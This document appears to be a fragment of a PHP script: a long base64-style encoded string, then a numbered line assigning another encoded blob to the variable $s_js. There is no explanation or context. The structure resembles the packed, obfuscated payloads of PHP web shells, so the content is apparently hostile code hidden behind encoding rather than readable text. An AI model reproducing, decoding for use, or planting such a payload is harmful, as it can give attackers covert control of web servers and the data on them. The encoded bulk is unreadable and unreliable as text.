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";
  112. $s_js = "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